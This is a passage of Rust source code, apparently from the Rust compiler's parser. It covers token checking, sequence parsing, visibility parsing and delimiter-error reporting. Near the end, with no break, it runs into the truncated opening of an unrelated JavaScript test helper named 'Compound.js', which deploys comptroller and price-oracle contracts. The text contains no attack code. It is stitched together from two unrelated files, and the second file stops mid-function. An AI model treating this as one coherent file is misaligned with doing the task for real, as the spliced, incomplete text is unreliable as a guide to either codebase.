[TokenTree::token(token::Pound, sp), TokenTree::token(token::Not, sp), body]
.iter()
.cloned()
.collect::<TokenStream>()
} else {
[TokenTree::token(token::Pound, sp), body]
.iter()
.cloned()
.collect::<TokenStream>()
},
),
));
self.next()
}
}
#[derive(Clone, PartialEq)]
enum TokenType {
Token(TokenKind),
Keyword(Symbol),
Operator,
Lifetime,
Ident,
Path,
Type,
Const,
}
impl TokenType {
fn to_string(&self) -> String {
match *self {
TokenType::Token(ref t) => format!("`{}`", pprust::token_kind_to_string(t)),
TokenType::Keyword(kw) => format!("`{}`", kw),
TokenType::Operator => "an operator".to_string(),
TokenType::Lifetime => "lifetime".to_string(),
TokenType::Ident => "identifier".to_string(),
TokenType::Path => "path".to_string(),
TokenType::Type => "type".to_string(),
TokenType::Const => "const".to_string(),
}
}
}
#[derive(Copy, Clone, Debug)]
enum TokenExpectType {
Expect,
NoExpect,
}
/// A sequence separator.
struct SeqSep {
/// The separator token.
sep: Option<TokenKind>,
/// `true` if a trailing separator is allowed.
trailing_sep_allowed: bool,
}
impl SeqSep {
fn trailing_allowed(t: TokenKind) -> SeqSep {
SeqSep { sep: Some(t), trailing_sep_allowed: true }
}
fn none() -> SeqSep {
SeqSep { sep: None, trailing_sep_allowed: false }
}
}
pub enum FollowedByType {
Yes,
No,
}
fn token_descr_opt(token: &Token) -> Option<&'static str> {
Some(match token.kind {
_ if token.is_special_ident() => "reserved identifier",
_ if token.is_used_keyword() => "keyword",
_ if token.is_unused_keyword() => "reserved keyword",
token::DocComment(..) => "doc comment",
_ => return None,
})
}
pub(super) fn token_descr(token: &Token) -> String {
let token_str = pprust::token_to_string(token);
match token_descr_opt(token) {
Some(prefix) => format!("{} `{}`", prefix, token_str),
_ => format!("`{}`", token_str),
}
}
impl<'a> Parser<'a> {
pub fn new(
sess: &'a ParseSess,
tokens: TokenStream,
desugar_doc_comments: bool,
subparser_name: Option<&'static str>,
) -> Self {
let mut parser = Parser {
sess,
token: Token::dummy(),
prev_token: Token::dummy(),
restrictions: Restrictions::empty(),
expected_tokens: Vec::new(),
token_cursor: TokenCursor {
frame: TokenCursorFrame::new(DelimSpan::dummy(), token::NoDelim, &tokens),
stack: Vec::new(),
cur_token: None,
collecting: None,
},
desugar_doc_comments,
unmatched_angle_bracket_count: 0,
max_angle_bracket_count: 0,
unclosed_delims: Vec::new(),
last_unexpected_token_span: None,
last_type_ascription: None,
subparser_name,
};
// Make parser point to the first token.
parser.bump();
parser
}
fn next_tok(&mut self, fallback_span: Span) -> Token {
let mut next = if self.desugar_doc_comments {
self.token_cursor.next_desugared()
} else {
self.token_cursor.next()
};
if next.span.is_dummy() {
// Tweak the location for better diagnostics, but keep syntactic context intact.
next.span = fallback_span.with_ctxt(next.span.ctxt());
}
next
}
pub fn unexpected<T>(&mut self) -> PResult<'a, T> {
match self.expect_one_of(&[], &[]) {
Err(e) => Err(e),
// We can get `Ok(true)` from `recover_closing_delimiter`
// which is called in `expected_one_of_not_found`.
Ok(_) => FatalError.raise(),
}
}
/// Expects and consumes the token `t`. Signals an error if the next token is not `t`.
pub fn expect(&mut self, t: &TokenKind) -> PResult<'a, bool /* recovered */> {
if self.expected_tokens.is_empty() {
if self.token == *t {
self.bump();
Ok(false)
} else {
self.unexpected_try_recover(t)
}
} else {
self.expect_one_of(slice::from_ref(t), &[])
}
}
    /// Expects the next token to be an edible or inedible token. If edible,
    /// consumes it; if inedible, returns without consuming
    /// anything. Signals a fatal error if the next token is unexpected.
pub fn expect_one_of(
&mut self,
edible: &[TokenKind],
inedible: &[TokenKind],
) -> PResult<'a, bool /* recovered */> {
if edible.contains(&self.token.kind) {
self.bump();
Ok(false)
} else if inedible.contains(&self.token.kind) {
// leave it in the input
Ok(false)
} else if self.last_unexpected_token_span == Some(self.token.span) {
FatalError.raise();
} else {
self.expected_one_of_not_found(edible, inedible)
}
}
// Public for rustfmt usage.
pub fn parse_ident(&mut self) -> PResult<'a, Ident> {
self.parse_ident_common(true)
}
fn parse_ident_common(&mut self, recover: bool) -> PResult<'a, Ident> {
match self.token.ident() {
Some((ident, is_raw)) => {
if !is_raw && ident.is_reserved() {
let mut err = self.expected_ident_found();
if recover {
err.emit();
} else {
return Err(err);
}
}
self.bump();
Ok(ident)
}
_ => Err(match self.prev_token.kind {
TokenKind::DocComment(..) => {
self.span_fatal_err(self.prev_token.span, Error::UselessDocComment)
}
_ => self.expected_ident_found(),
}),
}
}
/// Checks if the next token is `tok`, and returns `true` if so.
///
/// This method will automatically add `tok` to `expected_tokens` if `tok` is not
/// encountered.
fn check(&mut self, tok: &TokenKind) -> bool {
let is_present = self.token == *tok;
if !is_present {
self.expected_tokens.push(TokenType::Token(tok.clone()));
}
is_present
}
    /// Consumes the token `tok` if it exists. Returns whether the given token was present.
pub fn eat(&mut self, tok: &TokenKind) -> bool {
let is_present = self.check(tok);
if is_present {
self.bump()
}
is_present
}
/// If the next token is the given keyword, returns `true` without eating it.
/// An expectation is also added for diagnostics purposes.
fn check_keyword(&mut self, kw: Symbol) -> bool {
self.expected_tokens.push(TokenType::Keyword(kw));
self.token.is_keyword(kw)
}
/// If the next token is the given keyword, eats it and returns `true`.
/// Otherwise, returns `false`. An expectation is also added for diagnostics purposes.
// Public for rustfmt usage.
pub fn eat_keyword(&mut self, kw: Symbol) -> bool {
if self.check_keyword(kw) {
self.bump();
true
} else {
false
}
}
fn eat_keyword_noexpect(&mut self, kw: Symbol) -> bool {
if self.token.is_keyword(kw) {
self.bump();
true
} else {
false
}
}
/// If the given word is not a keyword, signals an error.
/// If the next token is not the given word, signals an error.
/// Otherwise, eats it.
fn expect_keyword(&mut self, kw: Symbol) -> PResult<'a, ()> {
if !self.eat_keyword(kw) { self.unexpected() } else { Ok(()) }
}
/// Is the given keyword `kw` followed by a non-reserved identifier?
fn is_kw_followed_by_ident(&self, kw: Symbol) -> bool {
self.token.is_keyword(kw) && self.look_ahead(1, |t| t.is_ident() && !t.is_reserved_ident())
}
fn check_or_expected(&mut self, ok: bool, typ: TokenType) -> bool {
if ok {
true
} else {
self.expected_tokens.push(typ);
false
}
}
fn check_ident(&mut self) -> bool {
self.check_or_expected(self.token.is_ident(), TokenType::Ident)
}
fn check_path(&mut self) -> bool {
self.check_or_expected(self.token.is_path_start(), TokenType::Path)
}
fn check_type(&mut self) -> bool {
self.check_or_expected(self.token.can_begin_type(), TokenType::Type)
}
fn check_const_arg(&mut self) -> bool {
self.check_or_expected(self.token.can_begin_const_arg(), TokenType::Const)
}
fn check_inline_const(&mut self) -> bool {
self.check_keyword(kw::Const)
&& self.look_ahead(1, |t| t == &token::OpenDelim(DelimToken::Brace))
}
/// Checks to see if the next token is either `+` or `+=`.
/// Otherwise returns `false`.
fn check_plus(&mut self) -> bool {
self.check_or_expected(
self.token.is_like_plus(),
TokenType::Token(token::BinOp(token::Plus)),
)
}
    /// Eats the expected token if it's present, possibly breaking
    /// compound tokens like multi-character operators in the process.
/// Returns `true` if the token was eaten.
fn break_and_eat(&mut self, expected: TokenKind) -> bool {
if self.token.kind == expected {
self.bump();
return true;
}
match self.token.kind.break_two_token_op() {
Some((first, second)) if first == expected => {
let first_span = self.sess.source_map().start_point(self.token.span);
let second_span = self.token.span.with_lo(first_span.hi());
self.token = Token::new(first, first_span);
self.bump_with(Token::new(second, second_span));
true
}
_ => {
self.expected_tokens.push(TokenType::Token(expected));
false
}
}
}
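    // For illustration: if the parser expects `<` but the current token is
    // `<<`, the call above splits the compound token, eats the first `<`
    // (it becomes `prev_token`), and leaves the second `<` as the current
    // token; this is what `eat_lt` and `expect_gt` below rely on.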
    /// Eats `+`, possibly breaking tokens like `+=` in the process.
fn eat_plus(&mut self) -> bool {
self.break_and_eat(token::BinOp(token::Plus))
}
    /// Eats `&`, possibly breaking tokens like `&&` in the process.
/// Signals an error if `&` is not eaten.
fn expect_and(&mut self) -> PResult<'a, ()> {
if self.break_and_eat(token::BinOp(token::And)) { Ok(()) } else { self.unexpected() }
}
    /// Eats `|`, possibly breaking tokens like `||` in the process.
/// Signals an error if `|` was not eaten.
fn expect_or(&mut self) -> PResult<'a, ()> {
if self.break_and_eat(token::BinOp(token::Or)) { Ok(()) } else { self.unexpected() }
}
    /// Eats `<`, possibly breaking tokens like `<<` in the process.
    fn eat_lt(&mut self) -> bool {
let ate = self.break_and_eat(token::Lt);
if ate {
// See doc comment for `unmatched_angle_bracket_count`.
self.unmatched_angle_bracket_count += 1;
self.max_angle_bracket_count += 1;
debug!("eat_lt: (increment) count={:?}", self.unmatched_angle_bracket_count);
}
ate
}
    /// Eats `<`, possibly breaking tokens like `<<` in the process.
/// Signals an error if `<` was not eaten.
fn expect_lt(&mut self) -> PResult<'a, ()> {
if self.eat_lt() { Ok(()) } else { self.unexpected() }
}
    /// Eats `>`, possibly breaking tokens like `>>` in the process.
/// Signals an error if `>` was not eaten.
fn expect_gt(&mut self) -> PResult<'a, ()> {
if self.break_and_eat(token::Gt) {
// See doc comment for `unmatched_angle_bracket_count`.
if self.unmatched_angle_bracket_count > 0 {
self.unmatched_angle_bracket_count -= 1;
debug!("expect_gt: (decrement) count={:?}", self.unmatched_angle_bracket_count);
}
Ok(())
} else {
self.unexpected()
}
}
fn expect_any_with_type(&mut self, kets: &[&TokenKind], expect: TokenExpectType) -> bool {
kets.iter().any(|k| match expect {
TokenExpectType::Expect => self.check(k),
TokenExpectType::NoExpect => self.token == **k,
})
}
fn parse_seq_to_before_tokens<T>(
&mut self,
kets: &[&TokenKind],
sep: SeqSep,
expect: TokenExpectType,
mut f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool /* trailing */, bool /* recovered */)> {
let mut first = true;
let mut recovered = false;
let mut trailing = false;
let mut v = vec![];
while !self.expect_any_with_type(kets, expect) {
if let token::CloseDelim(..) | token::Eof = self.token.kind {
break;
}
if let Some(ref t) = sep.sep {
if first {
first = false;
} else {
match self.expect(t) {
Ok(false) => {}
Ok(true) => {
recovered = true;
break;
}
Err(mut expect_err) => {
let sp = self.prev_token.span.shrink_to_hi();
let token_str = pprust::token_kind_to_string(t);
// Attempt to keep parsing if it was a similar separator.
if let Some(ref tokens) = t.similar_tokens() {
if tokens.contains(&self.token.kind) {
self.bump();
}
}
// If this was a missing `@` in a binding pattern
// bail with a suggestion
// https://github.com/rust-lang/rust/issues/72373
if self.prev_token.is_ident() && self.token.kind == token::DotDot {
let msg = format!(
"if you meant to bind the contents of \
the rest of the array pattern into `{}`, use `@`",
pprust::token_to_string(&self.prev_token)
);
expect_err
.span_suggestion_verbose(
self.prev_token.span.shrink_to_hi().until(self.token.span),
&msg,
" @ ".to_string(),
Applicability::MaybeIncorrect,
)
.emit();
break;
}
// Attempt to keep parsing if it was an omitted separator.
match f(self) {
Ok(t) => {
// Parsed successfully, therefore most probably the code only
// misses a separator.
let mut exp_span = self.sess.source_map().next_point(sp);
if self.sess.source_map().is_multiline(exp_span) {
exp_span = sp;
}
expect_err
.span_suggestion_short(
exp_span,
&format!("missing `{}`", token_str),
token_str,
Applicability::MaybeIncorrect,
)
.emit();
v.push(t);
continue;
}
Err(mut e) => {
// Parsing failed, therefore it must be something more serious
// than just a missing separator.
expect_err.emit();
e.cancel();
break;
}
}
}
}
}
}
if sep.trailing_sep_allowed && self.expect_any_with_type(kets, expect) {
trailing = true;
break;
}
let t = f(self)?;
v.push(t);
}
Ok((v, trailing, recovered))
}
/// Parses a sequence, not including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
fn parse_seq_to_before_end<T>(
&mut self,
ket: &TokenKind,
sep: SeqSep,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool, bool)> {
self.parse_seq_to_before_tokens(&[ket], sep, TokenExpectType::Expect, f)
}
/// Parses a sequence, including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
fn parse_seq_to_end<T>(
&mut self,
ket: &TokenKind,
sep: SeqSep,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool /* trailing */)> {
let (val, trailing, recovered) = self.parse_seq_to_before_end(ket, sep, f)?;
if !recovered {
self.eat(ket);
}
Ok((val, trailing))
}
/// Parses a sequence, including the closing delimiter. The function
/// `f` must consume tokens until reaching the next separator or
/// closing bracket.
fn parse_unspanned_seq<T>(
&mut self,
bra: &TokenKind,
ket: &TokenKind,
sep: SeqSep,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool)> {
self.expect(bra)?;
self.parse_seq_to_end(ket, sep, f)
}
fn parse_delim_comma_seq<T>(
&mut self,
delim: DelimToken,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool)> {
self.parse_unspanned_seq(
&token::OpenDelim(delim),
&token::CloseDelim(delim),
SeqSep::trailing_allowed(token::Comma),
f,
)
}
fn parse_paren_comma_seq<T>(
&mut self,
f: impl FnMut(&mut Parser<'a>) -> PResult<'a, T>,
) -> PResult<'a, (Vec<T>, bool)> {
self.parse_delim_comma_seq(token::Paren, f)
}
    /// Advance the parser by one token using the provided token as the next one.
fn bump_with(&mut self, next_token: Token) {
// Bumping after EOF is a bad sign, usually an infinite loop.
if self.prev_token.kind == TokenKind::Eof {
let msg = "attempted to bump the parser past EOF (may be stuck in a loop)";
self.span_bug(self.token.span, msg);
}
// Update the current and previous tokens.
self.prev_token = mem::replace(&mut self.token, next_token);
// Diagnostics.
self.expected_tokens.clear();
}
/// Advance the parser by one token.
pub fn bump(&mut self) {
let next_token = self.next_tok(self.token.span);
self.bump_with(next_token);
}
/// Look-ahead `dist` tokens of `self.token` and get access to that token there.
/// When `dist == 0` then the current token is looked at.
pub fn look_ahead<R>(&self, dist: usize, looker: impl FnOnce(&Token) -> R) -> R {
if dist == 0 {
return looker(&self.token);
}
let frame = &self.token_cursor.frame;
looker(&match frame.tree_cursor.look_ahead(dist - 1) {
Some(tree) => match tree {
TokenTree::Token(token) => token,
TokenTree::Delimited(dspan, delim, _) => {
Token::new(token::OpenDelim(delim), dspan.open)
}
},
None => Token::new(token::CloseDelim(frame.delim), frame.span.close),
})
}
/// Returns whether any of the given keywords are `dist` tokens ahead of the current one.
fn is_keyword_ahead(&self, dist: usize, kws: &[Symbol]) -> bool {
self.look_ahead(dist, |t| kws.iter().any(|&kw| t.is_keyword(kw)))
}
/// Parses asyncness: `async` or nothing.
fn parse_asyncness(&mut self) -> Async {
if self.eat_keyword(kw::Async) {
let span = self.prev_token.uninterpolated_span();
Async::Yes { span, closure_id: DUMMY_NODE_ID, return_impl_trait_id: DUMMY_NODE_ID }
} else {
Async::No
}
}
/// Parses unsafety: `unsafe` or nothing.
fn parse_unsafety(&mut self) -> Unsafe {
if self.eat_keyword(kw::Unsafe) {
Unsafe::Yes(self.prev_token.uninterpolated_span())
} else {
Unsafe::No
}
}
/// Parses constness: `const` or nothing.
fn parse_constness(&mut self) -> Const {
        // Avoid parsing const blocks as const items
if self.look_ahead(1, |t| t != &token::OpenDelim(DelimToken::Brace))
&& self.eat_keyword(kw::Const)
{
Const::Yes(self.prev_token.uninterpolated_span())
} else {
Const::No
}
}
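    // For illustration: given `const { 1 + 2 }`, the `{` lookahead above makes
    // `parse_constness` return `Const::No`, leaving the `const` keyword for
    // `parse_const_expr` below to consume as an inline const block.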
/// Parses inline const expressions.
fn parse_const_expr(&mut self, span: Span) -> PResult<'a, P<Expr>> {
self.sess.gated_spans.gate(sym::inline_const, span);
self.eat_keyword(kw::Const);
let blk = self.parse_block()?;
let anon_const = AnonConst {
id: DUMMY_NODE_ID,
value: self.mk_expr(blk.span, ExprKind::Block(blk, None), AttrVec::new()),
};
Ok(self.mk_expr(span, ExprKind::ConstBlock(anon_const), AttrVec::new()))
}
/// Parses mutability (`mut` or nothing).
fn parse_mutability(&mut self) -> Mutability {
if self.eat_keyword(kw::Mut) { Mutability::Mut } else { Mutability::Not }
}
/// Possibly parses mutability (`const` or `mut`).
fn parse_const_or_mut(&mut self) -> Option<Mutability> {
if self.eat_keyword(kw::Mut) {
Some(Mutability::Mut)
} else if self.eat_keyword(kw::Const) {
Some(Mutability::Not)
} else {
None
}
}
fn parse_field_name(&mut self) -> PResult<'a, Ident> {
if let token::Literal(token::Lit { kind: token::Integer, symbol, suffix }) = self.token.kind
{
self.expect_no_suffix(self.token.span, "a tuple index", suffix);
self.bump();
Ok(Ident::new(symbol, self.prev_token.span))
} else {
self.parse_ident_common(false)
}
}
fn parse_mac_args(&mut self) -> PResult<'a, P<MacArgs>> {
self.parse_mac_args_common(true).map(P)
}
fn parse_attr_args(&mut self) -> PResult<'a, MacArgs> {
self.parse_mac_args_common(false)
}
fn parse_mac_args_common(&mut self, delimited_only: bool) -> PResult<'a, MacArgs> {
Ok(
if self.check(&token::OpenDelim(DelimToken::Paren))
|| self.check(&token::OpenDelim(DelimToken::Bracket))
|| self.check(&token::OpenDelim(DelimToken::Brace))
{
match self.parse_token_tree() {
TokenTree::Delimited(dspan, delim, tokens) =>
// We've confirmed above that there is a delimiter so unwrapping is OK.
{
MacArgs::Delimited(dspan, MacDelimiter::from_token(delim).unwrap(), tokens)
}
_ => unreachable!(),
}
} else if !delimited_only {
if self.eat(&token::Eq) {
let eq_span = self.prev_token.span;
let mut is_interpolated_expr = false;
if let token::Interpolated(nt) = &self.token.kind {
if let token::NtExpr(..) = **nt {
is_interpolated_expr = true;
}
}
let token_tree = if is_interpolated_expr {
// We need to accept arbitrary interpolated expressions to continue
// supporting things like `doc = $expr` that work on stable.
// Non-literal interpolated expressions are rejected after expansion.
self.parse_token_tree()
} else {
self.parse_unsuffixed_lit()?.token_tree()
};
MacArgs::Eq(eq_span, token_tree.into())
} else {
MacArgs::Empty
}
} else {
return self.unexpected();
},
)
}
fn parse_or_use_outer_attributes(
&mut self,
already_parsed_attrs: Option<AttrVec>,
) -> PResult<'a, AttrVec> {
if let Some(attrs) = already_parsed_attrs {
Ok(attrs)
} else {
self.parse_outer_attributes().map(|a| a.into())
}
}
/// Parses a single token tree from the input.
pub(crate) fn parse_token_tree(&mut self) -> TokenTree {
match self.token.kind {
token::OpenDelim(..) => {
let frame = mem::replace(
&mut self.token_cursor.frame,
self.token_cursor.stack.pop().unwrap(),
);
self.token = Token::new(TokenKind::CloseDelim(frame.delim), frame.span.close);
self.bump();
TokenTree::Delimited(frame.span, frame.delim, frame.tree_cursor.stream)
}
token::CloseDelim(_) | token::Eof => unreachable!(),
_ => {
self.bump();
TokenTree::Token(self.prev_token.clone())
}
}
}
/// Parses a stream of tokens into a list of `TokenTree`s, up to EOF.
pub fn parse_all_token_trees(&mut self) -> PResult<'a, Vec<TokenTree>> {
let mut tts = Vec::new();
while self.token != token::Eof {
tts.push(self.parse_token_tree());
}
Ok(tts)
}
pub fn parse_tokens(&mut self) -> TokenStream {
let mut result = Vec::new();
loop {
match self.token.kind {
token::Eof | token::CloseDelim(..) => break,
_ => result.push(self.parse_token_tree().into()),
}
}
TokenStream::new(result)
}
/// Evaluates the closure with restrictions in place.
///
    /// After the closure is evaluated, restrictions are reset.
fn with_res<T>(&mut self, res: Restrictions, f: impl FnOnce(&mut Self) -> T) -> T {
let old = self.restrictions;
self.restrictions = res;
let res = f(self);
self.restrictions = old;
res
}
fn is_crate_vis(&self) -> bool {
self.token.is_keyword(kw::Crate) && self.look_ahead(1, |t| t != &token::ModSep)
}
/// Parses `pub`, `pub(crate)` and `pub(in path)` plus shortcuts `crate` for `pub(crate)`,
/// `pub(self)` for `pub(in self)` and `pub(super)` for `pub(in super)`.
    /// If the following element can't be a tuple (i.e., it's a function definition), then
    /// it's not a tuple struct field, and if the contents within the parentheses aren't a
    /// valid visibility restriction, emit a proper diagnostic.
// Public for rustfmt usage.
pub fn parse_visibility(&mut self, fbt: FollowedByType) -> PResult<'a, Visibility> {
maybe_whole!(self, NtVis, |x| x);
self.expected_tokens.push(TokenType::Keyword(kw::Crate));
if self.is_crate_vis() {
self.bump(); // `crate`
self.sess.gated_spans.gate(sym::crate_visibility_modifier, self.prev_token.span);
return Ok(Visibility {
span: self.prev_token.span,
kind: VisibilityKind::Crate(CrateSugar::JustCrate),
tokens: None,
});
}
if !self.eat_keyword(kw::Pub) {
// We need a span for our `Spanned<VisibilityKind>`, but there's inherently no
// keyword to grab a span from for inherited visibility; an empty span at the
// beginning of the current token would seem to be the "Schelling span".
return Ok(Visibility {
span: self.token.span.shrink_to_lo(),
kind: VisibilityKind::Inherited,
tokens: None,
});
}
let lo = self.prev_token.span;
if self.check(&token::OpenDelim(token::Paren)) {
// We don't `self.bump()` the `(` yet because this might be a struct definition where
// `()` or a tuple might be allowed. For example, `struct Struct(pub (), pub (usize));`.
// Because of this, we only `bump` the `(` if we're assured it is appropriate to do so
// by the following tokens.
if self.is_keyword_ahead(1, &[kw::Crate]) && self.look_ahead(2, |t| t != &token::ModSep)
// account for `pub(crate::foo)`
{
// Parse `pub(crate)`.
self.bump(); // `(`
self.bump(); // `crate`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = VisibilityKind::Crate(CrateSugar::PubCrate);
return Ok(Visibility {
span: lo.to(self.prev_token.span),
kind: vis,
tokens: None,
});
} else if self.is_keyword_ahead(1, &[kw::In]) {
// Parse `pub(in path)`.
self.bump(); // `(`
self.bump(); // `in`
let path = self.parse_path(PathStyle::Mod)?; // `path`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = VisibilityKind::Restricted { path: P(path), id: ast::DUMMY_NODE_ID };
return Ok(Visibility {
span: lo.to(self.prev_token.span),
kind: vis,
tokens: None,
});
} else if self.look_ahead(2, |t| t == &token::CloseDelim(token::Paren))
&& self.is_keyword_ahead(1, &[kw::Super, kw::SelfLower])
{
// Parse `pub(self)` or `pub(super)`.
self.bump(); // `(`
let path = self.parse_path(PathStyle::Mod)?; // `super`/`self`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = VisibilityKind::Restricted { path: P(path), id: ast::DUMMY_NODE_ID };
return Ok(Visibility {
span: lo.to(self.prev_token.span),
kind: vis,
tokens: None,
});
} else if let FollowedByType::No = fbt {
// Provide this diagnostic if a type cannot follow;
// in particular, if this is not a tuple struct.
self.recover_incorrect_vis_restriction()?;
// Emit diagnostic, but continue with public visibility.
}
}
Ok(Visibility { span: lo, kind: VisibilityKind::Public, tokens: None })
}
/// Recovery for e.g. `pub(something) fn ...` or `struct X { pub(something) y: Z }`
fn recover_incorrect_vis_restriction(&mut self) -> PResult<'a, ()> {
self.bump(); // `(`
let path = self.parse_path(PathStyle::Mod)?;
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let msg = "incorrect visibility restriction";
let suggestion = r##"some possible visibility restrictions are:
`pub(crate)`: visible only on the current crate
`pub(super)`: visible only in the current module's parent
`pub(in path::to::module)`: visible only on the specified path"##;
let path_str = pprust::path_to_string(&path);
struct_span_err!(self.sess.span_diagnostic, path.span, E0704, "{}", msg)
.help(suggestion)
.span_suggestion(
path.span,
&format!("make this visible only to module `{}` with `in`", path_str),
format!("in {}", path_str),
Applicability::MachineApplicable,
)
.emit();
Ok(())
}
/// Parses `extern string_literal?`.
fn parse_extern(&mut self) -> PResult<'a, Extern> {
Ok(if self.eat_keyword(kw::Extern) {
Extern::from_abi(self.parse_abi())
} else {
Extern::None
})
}
/// Parses a string literal as an ABI spec.
fn parse_abi(&mut self) -> Option<StrLit> {
match self.parse_str_lit() {
Ok(str_lit) => Some(str_lit),
Err(Some(lit)) => match lit.kind {
ast::LitKind::Err(_) => None,
_ => {
self.struct_span_err(lit.span, "non-string ABI literal")
.span_suggestion(
lit.span,
"specify the ABI with a string literal",
"\"C\"".to_string(),
Applicability::MaybeIncorrect,
)
.emit();
None
}
},
Err(None) => None,
}
}
/// Records all tokens consumed by the provided callback,
/// including the current token. These tokens are collected
/// into a `TokenStream`, and returned along with the result
/// of the callback.
///
/// Note: If your callback consumes an opening delimiter
/// (including the case where you call `collect_tokens`
    /// when the current token is an opening delimiter),
/// you must also consume the corresponding closing delimiter.
///
/// That is, you can consume
/// `something ([{ }])` or `([{}])`, but not `([{}]`
///
/// This restriction shouldn't be an issue in practice,
/// since this function is used to record the tokens for
/// a parsed AST item, which always has matching delimiters.
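    ///
    /// A minimal sketch of a conforming call (`parse_item` here is only an
    /// assumed example of a callback):
    ///
    /// ```ignore
    /// let (item, tokens) = parser.collect_tokens(|p| p.parse_item())?;
    /// ```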
pub fn collect_tokens<R>(
&mut self,
f: impl FnOnce(&mut Self) -> PResult<'a, R>,
) -> PResult<'a, (R, TokenStream)> {
// Record all tokens we parse when parsing this item.
let tokens: Vec<TreeAndSpacing> = self.token_cursor.cur_token.clone().into_iter().collect();
debug!("collect_tokens: starting with {:?}", tokens);
// We need special handling for the case where `collect_tokens` is called
        // on an opening delimiter (e.g. '('). At this point, we have already pushed
// a new frame - however, we want to record the original `TokenTree::Delimited`,
// for consistency with the case where we start recording one token earlier.
// See `TokenCursor::next` to see how `cur_token` is set up.
let prev_depth =
if matches!(self.token_cursor.cur_token, Some((TokenTree::Delimited(..), _))) {
if self.token_cursor.stack.is_empty() {
// There is nothing below us in the stack that
// the function could consume, so the only thing it can legally
// capture is the entire contents of the current frame.
return Ok((f(self)?, TokenStream::new(tokens)));
}
// We have already recorded the full `TokenTree::Delimited` when we created
// our `tokens` vector at the start of this function. We are now inside
                // a new frame corresponding to the `TokenTree::Delimited` we already recorded.
// We don't want to record any of the tokens inside this frame, since they
// will be duplicates of the tokens nested inside the `TokenTree::Delimited`.
// Therefore, we set our recording depth to the *previous* frame. This allows
                // us to record a sequence like: `(foo).bar()`: the `(foo)` will be recorded
                // as our initial `cur_token`, while the `.bar()` will be recorded after we
// pop the `(foo)` frame.
self.token_cursor.stack.len() - 1
} else {
self.token_cursor.stack.len()
};
let prev_collecting =
self.token_cursor.collecting.replace(Collecting { buf: tokens, depth: prev_depth });
let ret = f(self);
let mut collected_tokens = if let Some(collecting) = self.token_cursor.collecting.take() {
collecting.buf
} else {
let msg = "our vector went away?";
debug!("collect_tokens: {}", msg);
self.sess.span_diagnostic.delay_span_bug(self.token.span, &msg);
// This can happen due to a bad interaction of two unrelated recovery mechanisms
// with mismatched delimiters *and* recovery lookahead on the likely typo
// `pub ident(` (#62895, different but similar to the case above).
return Ok((ret?, TokenStream::default()));
};
debug!("collect_tokens: got raw tokens {:?}", collected_tokens);
// If we're not at EOF our current token wasn't actually consumed by
// `f`, but it'll still be in our list that we pulled out. In that case
// put it back.
let extra_token = if self.token != token::Eof { collected_tokens.pop() } else { None };
if let Some(mut collecting) = prev_collecting {
// If we were previously collecting at the same depth,
// then the previous call to `collect_tokens` needs to see
// the tokens we just recorded.
//
            // If we were previously recording at a lower `depth`,
// then the previous `collect_tokens` call already recorded
// this entire frame in the form of a `TokenTree::Delimited`,
// so there is nothing else for us to do.
if collecting.depth == prev_depth {
collecting.buf.extend(collected_tokens.iter().cloned());
collecting.buf.extend(extra_token);
debug!("collect_tokens: updating previous buf to {:?}", collecting);
}
self.token_cursor.collecting = Some(collecting)
}
Ok((ret?, TokenStream::new(collected_tokens)))
}
/// `::{` or `::*`
fn is_import_coupler(&mut self) -> bool {
self.check(&token::ModSep)
&& self.look_ahead(1, |t| {
*t == token::OpenDelim(token::Brace) || *t == token::BinOp(token::Star)
})
}
pub fn clear_expected_tokens(&mut self) {
self.expected_tokens.clear();
}
}
crate fn make_unclosed_delims_error(
unmatched: UnmatchedBrace,
sess: &ParseSess,
) -> Option<DiagnosticBuilder<'_>> {
// `None` here means an `Eof` was found. We already emit those errors elsewhere, we add them to
// `unmatched_braces` only for error recovery in the `Parser`.
let found_delim = unmatched.found_delim?;
let mut err = sess.span_diagnostic.struct_span_err(
unmatched.found_span,
&format!(
"mismatched closing delimiter: `{}`",
pprust::token_kind_to_string(&token::CloseDelim(found_delim)),
),
);
err.span_label(unmatched.found_span, "mismatched closing delimiter");
if let Some(sp) = unmatched.candidate_span {
err.span_label(sp, "closing delimiter possibly meant for this");
}
if let Some(sp) = unmatched.unclosed_span {
err.span_label(sp, "unclosed delimiter");
}
Some(err)
}
pub fn emit_unclosed_delims(unclosed_delims: &mut Vec<UnmatchedBrace>, sess: &ParseSess) {
*sess.reached_eof.borrow_mut() |=
unclosed_delims.iter().any(|unmatched_delim| unmatched_delim.found_delim.is_none());
for unmatched in unclosed_delims.drain(..) {
if let Some(mut e) = make_unclosed_delims_error(unmatched, sess) {
e.emit();
}
}
}
Compound.js
"use strict";
const { dfn } = require('./JS');
const {
encodeParameters,
etherBalance,
etherMantissa,
etherUnsigned,
mergeInterface
} = require('./Ethereum');
async function makeComptroller(opts = {}) {
const {
root = saddle.account,
kind = 'unitroller'
} = opts || {};
if (kind == 'bool') {
return await deploy('BoolComptroller');
}
if (kind == 'false-marker') {
return await deploy('FalseMarkerMethodComptroller');
}
if (kind == 'v1-no-proxy') {
const comptroller = await deploy('ComptrollerHarness');
const priceOracle = opts.priceOracle || await makePriceOracle(opts.priceOracleOpts);
const closeFactor = etherMantissa(dfn(opts.closeFactor, .051));
const maxAssets = etherUnsigned(dfn(opts.maxAssets, 10));
await send(comptroller, '_setCloseFactor', [closeFactor]);
await send(comptroller, '_setMaxAssets', [maxAssets]);
await send(comptroller, '_setPriceOracle', [priceOracle._address]);
return Object.assign(comptroller, { priceOracle });
}
if (kind == 'unitroller-prior') {
const unitroller = opts.unitroller || await deploy('Unitroller');
const comptroller = await deploy('ComptrollerG2');
const priceOracle = opts.priceOracle || await makePriceOracle(opts.priceOracleOpts);
const closeFactor = etherMantissa(dfn(opts.closeFactor, .051));
